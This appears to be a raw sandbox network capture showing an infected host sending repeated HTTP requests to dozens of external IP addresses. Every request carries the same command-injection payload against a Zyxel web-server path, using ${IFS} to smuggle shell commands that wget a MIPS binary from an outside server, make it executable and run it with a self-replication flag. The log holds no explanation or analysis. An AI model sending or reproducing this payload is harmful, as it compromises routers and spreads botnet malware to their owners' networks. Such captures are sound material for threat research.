                                    Jan 13, 2024 19:02:54.654789925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9509192.168.2.134149242.55.168.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.654858112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9510192.168.2.134624636.16.9.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.654931068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9511192.168.2.1339502191.200.254.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.655009985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9512192.168.2.135791220.68.54.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.655071974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9513192.168.2.134012476.193.74.160443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.655141115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9514192.168.2.135280263.226.243.10443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.655200958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9515192.168.2.134221419.11.108.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.655261040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9516192.168.2.1345286220.52.120.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.655318022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9517192.168.2.1360346223.155.171.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.655391932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9518192.168.2.133807827.191.86.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.655436993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9519192.168.2.1348288205.248.238.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.655483961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9520192.168.2.1355682142.118.197.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.655546904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9521192.168.2.134429470.7.238.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.655617952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9522192.168.2.1349526191.89.36.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.655678034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9523192.168.2.133963264.154.34.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.655739069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9524192.168.2.1359860165.247.200.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.655796051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9525192.168.2.1359812158.215.209.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.655873060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9526192.168.2.1339590168.3.108.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.655937910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9527192.168.2.133918290.212.229.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.656001091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9528192.168.2.134131275.189.37.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.656059980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9529192.168.2.1338490220.58.8.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.656126022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9530192.168.2.133472667.115.181.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.656191111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9531192.168.2.13570464.54.230.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.656255960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9532192.168.2.1355194203.14.151.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.656313896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9533192.168.2.1349968163.194.161.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.656388044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9534192.168.2.135126682.235.63.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.656443119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9535192.168.2.135262680.221.88.28443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.656476021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9536192.168.2.134307088.147.141.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.656543016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9537192.168.2.1354532173.196.15.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.656594038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9538192.168.2.134940050.40.207.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.656642914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9539192.168.2.13331545.158.42.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.656694889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9540192.168.2.134434881.133.203.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.656743050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9541192.168.2.1356094107.10.31.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.656785011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9542192.168.2.1338276132.145.174.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.656836033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9543192.168.2.133865423.12.193.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.656877995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9544192.168.2.1352438146.188.223.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.656935930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9545192.168.2.1337694187.53.35.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.656991959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9546192.168.2.135698434.73.181.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.657047033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9547192.168.2.1350414114.178.14.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.657115936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9548192.168.2.1343590130.146.88.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.657169104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9549192.168.2.1348724190.35.56.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.657233953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9550192.168.2.1333968172.79.223.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.657269955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9551192.168.2.1353124203.244.118.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.657335043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9552192.168.2.1337356115.51.64.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.657388926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9553192.168.2.1344806139.196.80.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.657468081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9554192.168.2.1351482158.130.44.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.657550097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9555192.168.2.1339950117.69.6.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.657603025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9556192.168.2.1335424131.178.164.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.657665968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9557192.168.2.134914075.222.169.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.657721996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9558192.168.2.133692014.4.94.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.657766104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9559192.168.2.1337782185.251.108.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.657838106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9560192.168.2.134595044.152.152.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.657903910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9561192.168.2.136060835.145.8.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.657974005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9562192.168.2.135402073.158.45.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.658037901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9563192.168.2.1343478161.136.134.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.658103943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9564192.168.2.133628679.206.157.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.658174992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9565192.168.2.1354112142.4.153.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.658246994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9566192.168.2.1359670196.113.25.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.658303976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9567192.168.2.133689017.166.87.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.658385992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9568192.168.2.135057067.41.138.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.658418894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9569192.168.2.1333262195.13.107.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.658478022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9570192.168.2.134885274.10.91.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:54.658545017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    9571192.168.2.134847020.203.126.44443
                                    TimestampBytes transferredDirectionData
